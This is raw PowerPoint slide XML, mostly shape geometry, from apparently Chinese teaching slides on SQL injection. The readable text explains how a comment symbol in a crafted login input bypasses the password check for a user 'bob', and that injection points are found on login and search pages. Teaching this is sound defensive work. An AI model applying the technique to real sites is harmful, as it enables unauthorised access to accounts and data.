              <a:off x="1460823" y="4405236"/>
              <a:ext cx="3630259" cy="799706"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>应用程序会构建并发送下面这条</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>查询：</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD430886-C798-4824-B05E-CC6AC51738DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316521" y="5572720"/>
            <a:ext cx="10153700" cy="874407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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这样，注释符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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后面的内容将会被完全注释掉，也就是说，对于伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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的用户，并不需求提供正确的密码，就可以查询到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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的相关信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326492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100783" y="1453648"/>
            <a:ext cx="10657184" cy="1010549"/>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如果要对一个网站进行</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注入攻击，首先</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需要找到存在</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注入漏洞的地方，也就是注入点。</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可能的</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注入点一般存在于</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登录页面、查找页面或添加页面等用户可以查找或修改数据的地方</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nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C50B2C-A152-45DE-BA13-49B41749E8EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="875216"/>
            <a:ext cx="2602152" cy="508862"/>
            <a:chOff x="596727" y="875216"/>
            <a:chExt cx="2602152" cy="508862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="组合 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="596727" y="875216"/>
              <a:ext cx="2602152" cy="508862"/>
              <a:chOff x="1420106" y="1402730"/>
              <a:chExt cx="2602152" cy="508862"/>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2723920" y="673011"/>
                <a:ext cx="508861" cy="1968301"/>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2053958" y="1402731"/>
                <a:ext cx="1968300"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寻找注入点</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3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24" name="job-search_296984">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B588E59F-04E8-439F-B3CF-8979B5207C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="806735" y="951326"/>
              <a:ext cx="280358" cy="356639"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY0" fmla="*/ 561042 h 606722"/>
                <a:gd name="connsiteX1" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY1" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX2" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY2" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX3" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY3" fmla="*/ 561042 h 606722"/>
                <a:gd name="connsiteX4" fmla="*/ 329893 w 476951"/>
                <a:gd name="connsiteY4" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX5" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY5" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX6" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY6" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX7" fmla="*/ 329893 w 476951"/>
                <a:gd name="connsiteY7" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX8" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY8" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX9" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY9" fmla="*/ 541519 h 606722"/>
                <a:gd name="connsiteX10" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY10" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX11" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY11" fmla="*/ 561066 h 606722"/>
                <a:gd name="connsiteX12" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY12" fmla="*/ 508875 h 606722"/>
                <a:gd name="connsiteX13" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY13" fmla="*/ 541491 h 606722"/>
                <a:gd name="connsiteX14" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY14" fmla="*/ 541491 h 606722"/>
                <a:gd name="connsiteX15" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY15" fmla="*/ 508875 h 606722"/>
                <a:gd name="connsiteX16" fmla="*/ 369057 w 476951"/>
                <a:gd name="connsiteY16" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX17" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY17" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX18" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY18" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX19" fmla="*/ 369057 w 476951"/>
                <a:gd name="connsiteY19" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX20" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY20" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX21" fmla="*/ 107753 w 476951"/>
                <a:gd name="connsiteY21" fmla="*/ 502285 h 606722"/>
                <a:gd name="connsiteX22" fmla="*/ 107753 w 476951"/>
                <a:gd name="connsiteY22" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX23" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY23" fmla="*/ 521832 h 606722"/>
                <a:gd name="connsiteX24" fmla="*/ 401728 w 476951"/>
                <a:gd name="connsiteY24" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX25" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY25" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX26" fmla="*/ 427908 w 476951"/>
                <a:gd name="connsiteY26" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX27" fmla="*/ 401728 w 476951"/>
                <a:gd name="connsiteY27" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX28" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY28" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX29" fmla="*/ 75082 w 476951"/>
                <a:gd name="connsiteY29" fmla="*/ 463192 h 606722"/>
                <a:gd name="connsiteX30" fmla="*/ 75082 w 476951"/>
                <a:gd name="connsiteY30" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX31" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY31" fmla="*/ 482739 h 606722"/>
                <a:gd name="connsiteX32" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY32" fmla="*/ 456619 h 606722"/>
                <a:gd name="connsiteX33" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY33" fmla="*/ 489235 h 606722"/>
                <a:gd name="connsiteX34" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY34" fmla="*/ 489235 h 606722"/>
                <a:gd name="connsiteX35" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY35" fmla="*/ 456619 h 606722"/>
                <a:gd name="connsiteX36" fmla="*/ 274395 w 476951"/>
                <a:gd name="connsiteY36" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX37" fmla="*/ 293975 w 476951"/>
                <a:gd name="connsiteY37" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX38" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY38" fmla="*/ 339208 h 606722"/>
                <a:gd name="connsiteX39" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY39" fmla="*/ 319653 h 606722"/>
                <a:gd name="connsiteX40" fmla="*/ 274395 w 476951"/>
                <a:gd name="connsiteY40" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX41" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY41" fmla="*/ 228350 h 606722"/>
                <a:gd name="connsiteX42" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY42" fmla="*/ 247880 h 606722"/>
                <a:gd name="connsiteX43" fmla="*/ 202574 w 476951"/>
                <a:gd name="connsiteY43" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX44" fmla="*/ 182905 w 476951"/>
                <a:gd name="connsiteY44" fmla="*/ 283744 h 606722"/>
                <a:gd name="connsiteX45" fmla="*/ 238440 w 476951"/>
                <a:gd name="connsiteY45" fmla="*/ 228350 h 606722"/>
                <a:gd name="connsiteX46" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY46" fmla="*/ 202267 h 606722"/>
                <a:gd name="connsiteX47" fmla="*/ 156828 w 476951"/>
                <a:gd name="connsiteY47" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX48" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY48" fmla="*/ 365378 h 606722"/>
                <a:gd name="connsiteX49" fmla="*/ 320124 w 476951"/>
                <a:gd name="connsiteY49" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX50" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY50" fmla="*/ 202267 h 606722"/>
                <a:gd name="connsiteX51" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY51" fmla="*/ 182623 h 606722"/>
                <a:gd name="connsiteX52" fmla="*/ 339702 w 476951"/>
                <a:gd name="connsiteY52" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX53" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY53" fmla="*/ 384934 h 606722"/>
                <a:gd name="connsiteX54" fmla="*/ 137250 w 476951"/>
                <a:gd name="connsiteY54" fmla="*/ 283778 h 606722"/>
                <a:gd name="connsiteX55" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY55" fmla="*/ 182623 h 606722"/>
                <a:gd name="connsiteX56" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY56" fmla="*/ 150014 h 606722"/>
                <a:gd name="connsiteX57" fmla="*/ 104575 w 476951"/>
                <a:gd name="connsiteY57" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX58" fmla="*/ 134034 w 476951"/>
                <a:gd name="connsiteY58" fmla="*/ 367392 h 606722"/>
                <a:gd name="connsiteX59" fmla="*/ 207993 w 476951"/>
                <a:gd name="connsiteY59" fmla="*/ 413872 h 606722"/>
                <a:gd name="connsiteX60" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY60" fmla="*/ 415649 h 606722"/>
                <a:gd name="connsiteX61" fmla="*/ 215558 w 476951"/>
                <a:gd name="connsiteY61" fmla="*/ 437067 h 606722"/>
                <a:gd name="connsiteX62" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY62" fmla="*/ 437067 h 606722"/>
                <a:gd name="connsiteX63" fmla="*/ 261304 w 476951"/>
                <a:gd name="connsiteY63" fmla="*/ 415649 h 606722"/>
                <a:gd name="connsiteX64" fmla="*/ 268869 w 476951"/>
                <a:gd name="connsiteY64" fmla="*/ 413872 h 606722"/>
                <a:gd name="connsiteX65" fmla="*/ 342917 w 476951"/>
                <a:gd name="connsiteY65" fmla="*/ 367392 h 606722"/>
                <a:gd name="connsiteX66" fmla="*/ 372376 w 476951"/>
                <a:gd name="connsiteY66" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX67" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY67" fmla="*/ 150014 h 606722"/>
                <a:gd name="connsiteX68" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY68" fmla="*/ 84820 h 606722"/>
                <a:gd name="connsiteX69" fmla="*/ 153550 w 476951"/>
                <a:gd name="connsiteY69" fmla="*/ 84820 h 606722"/>
                <a:gd name="connsiteX70" fmla="*/ 153550 w 476951"/>
                <a:gd name="connsiteY70" fmla="*/ 104367 h 606722"/>
                <a:gd name="connsiteX71" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY71" fmla="*/ 104367 h 606722"/>
                <a:gd name="connsiteX72" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY72" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX73" fmla="*/ 179660 w 476951"/>
                <a:gd name="connsiteY73" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX74" fmla="*/ 179660 w 476951"/>
                <a:gd name="connsiteY74" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX75" fmla="*/ 146988 w 476951"/>
                <a:gd name="connsiteY75" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX76" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY76" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX77" fmla="*/ 127371 w 476951"/>
                <a:gd name="connsiteY77" fmla="*/ 45656 h 606722"/>
                <a:gd name="connsiteX78" fmla="*/ 127371 w 476951"/>
                <a:gd name="connsiteY78" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX79" fmla="*/ 49043 w 476951"/>
                <a:gd name="connsiteY79" fmla="*/ 65203 h 606722"/>
                <a:gd name="connsiteX80" fmla="*/ 385459 w 476951"/>
                <a:gd name="connsiteY80" fmla="*/ 33415 h 606722"/>
                <a:gd name="connsiteX81" fmla="*/ 385459 w 476951"/>
                <a:gd name="connsiteY81" fmla="*/ 91359 h 606722"/>
                <a:gd name="connsiteX82" fmla="*/ 443487 w 476951"/>
                <a:gd name="connsiteY82" fmla="*/ 91359 h 606722"/>
                <a:gd name="connsiteX83" fmla="*/ 19580 w 476951"/>
                <a:gd name="connsiteY83" fmla="*/ 19551 h 606722"/>
                <a:gd name="connsiteX84" fmla="*/ 19580 w 476951"/>
                <a:gd name="connsiteY84" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX85" fmla="*/ 195978 w 476951"/>
                <a:gd name="connsiteY85" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX86" fmla="*/ 195978 w 476951"/>
                <a:gd name="connsiteY86" fmla="*/ 430935 h 606722"/>
                <a:gd name="connsiteX87" fmla="*/ 118726 w 476951"/>
                <a:gd name="connsiteY87" fmla="*/ 379657 h 606722"/>
                <a:gd name="connsiteX88" fmla="*/ 84906 w 476951"/>
                <a:gd name="connsiteY88" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX89" fmla="*/ 238431 w 476951"/>
                <a:gd name="connsiteY89" fmla="*/ 130462 h 606722"/>
                <a:gd name="connsiteX90" fmla="*/ 391956 w 476951"/>
                <a:gd name="connsiteY90" fmla="*/ 283765 h 606722"/>
                <a:gd name="connsiteX91" fmla="*/ 358136 w 476951"/>
                <a:gd name="connsiteY91" fmla="*/ 379657 h 606722"/>
                <a:gd name="connsiteX92" fmla="*/ 280884 w 476951"/>
                <a:gd name="connsiteY92" fmla="*/ 430935 h 606722"/>
                <a:gd name="connsiteX93" fmla="*/ 280884 w 476951"/>
                <a:gd name="connsiteY93" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX94" fmla="*/ 457282 w 476951"/>
                <a:gd name="connsiteY94" fmla="*/ 587082 h 606722"/>
                <a:gd name="connsiteX95" fmla="*/ 457282 w 476951"/>
                <a:gd name="connsiteY95" fmla="*/ 110911 h 606722"/>
                <a:gd name="connsiteX96" fmla="*/ 365879 w 476951"/>
                <a:gd name="connsiteY96" fmla="*/ 110911 h 606722"/>
                <a:gd name="connsiteX97" fmla="*/ 365879 w 476951"/>
                <a:gd name="connsiteY97" fmla="*/ 19551 h 606722"/>
                <a:gd name="connsiteX98" fmla="*/ 0 w 476951"/>
                <a:gd name="connsiteY98" fmla="*/ 0 h 606722"/>
                <a:gd name="connsiteX99" fmla="*/ 379674 w 476951"/>
                <a:gd name="connsiteY99" fmla="*/ 0 h 606722"/>
                <a:gd name="connsiteX100" fmla="*/ 476951 w 476951"/>
                <a:gd name="connsiteY100" fmla="*/ 97047 h 606722"/>
                <a:gd name="connsiteX101" fmla="*/ 476951 w 476951"/>
                <a:gd name="connsiteY101" fmla="*/ 606722 h 606722"/>
                <a:gd name="connsiteX102" fmla="*/ 0 w 476951"/>
                <a:gd name="connsiteY102" fmla="*/ 606722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476951" h="606722">
                  <a:moveTo>
                    <a:pt x="215558" y="561042"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215558" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="561042"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="329893" y="541519"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427908" y="541519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427908" y="561066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329893" y="561066"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="541519"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146988" y="541519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146988" y="561066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="561066"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="215558" y="508875"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215558" y="541491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="541491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="508875"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="369057" y="502285"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427908" y="502285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427908" y="521832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369057" y="521832"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="502285"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="107753" y="502285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107753" y="521832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="521832"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="401728" y="463192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427908" y="463192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427908" y="482739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401728" y="482739"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="463192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75082" y="463192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75082" y="482739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="482739"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="215558" y="456619"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="215558" y="489235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="489235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="456619"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="274395" y="283744"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="293975" y="283744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="293975" y="314320"/>
                    <a:pt x="269055" y="339208"/>
                    <a:pt x="238440" y="339208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="238440" y="319653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="258287" y="319653"/>
                    <a:pt x="274395" y="303565"/>
                    <a:pt x="274395" y="283744"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238440" y="228350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="238440" y="247880"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218682" y="247880"/>
                    <a:pt x="202574" y="263948"/>
                    <a:pt x="202574" y="283744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="182905" y="283744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182905" y="253206"/>
                    <a:pt x="207824" y="228350"/>
                    <a:pt x="238440" y="228350"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238431" y="202267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193402" y="202267"/>
                    <a:pt x="156828" y="238801"/>
                    <a:pt x="156828" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156828" y="328756"/>
                    <a:pt x="193402" y="365378"/>
                    <a:pt x="238431" y="365378"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283460" y="365378"/>
                    <a:pt x="320124" y="328756"/>
                    <a:pt x="320124" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320124" y="238801"/>
                    <a:pt x="283460" y="202267"/>
                    <a:pt x="238431" y="202267"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238431" y="182623"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="294317" y="182623"/>
                    <a:pt x="339702" y="228045"/>
                    <a:pt x="339702" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339702" y="339512"/>
                    <a:pt x="294317" y="384934"/>
                    <a:pt x="238431" y="384934"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182635" y="384934"/>
                    <a:pt x="137250" y="339512"/>
                    <a:pt x="137250" y="283778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137250" y="228045"/>
                    <a:pt x="182635" y="182623"/>
                    <a:pt x="238431" y="182623"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="238431" y="150014"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="164650" y="150014"/>
                    <a:pt x="104575" y="210002"/>
                    <a:pt x="104575" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104575" y="314514"/>
                    <a:pt x="114721" y="343486"/>
                    <a:pt x="134034" y="367392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152813" y="390677"/>
                    <a:pt x="179068" y="407118"/>
                    <a:pt x="207993" y="413872"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215558" y="415649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215558" y="437067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="437067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261304" y="415649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268869" y="413872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="297883" y="407118"/>
                    <a:pt x="324138" y="390677"/>
                    <a:pt x="342917" y="367392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362141" y="343486"/>
                    <a:pt x="372376" y="314514"/>
                    <a:pt x="372376" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372376" y="210002"/>
                    <a:pt x="312301" y="150014"/>
                    <a:pt x="238431" y="150014"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="84820"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153550" y="84820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153550" y="104367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="104367"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146988" y="45656"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="179660" y="45656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179660" y="65203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146988" y="65203"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49043" y="45656"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="127371" y="45656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127371" y="65203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49043" y="65203"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="385459" y="33415"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="385459" y="91359"/>
                  </a:lnTo>
                  <a:lnTo>
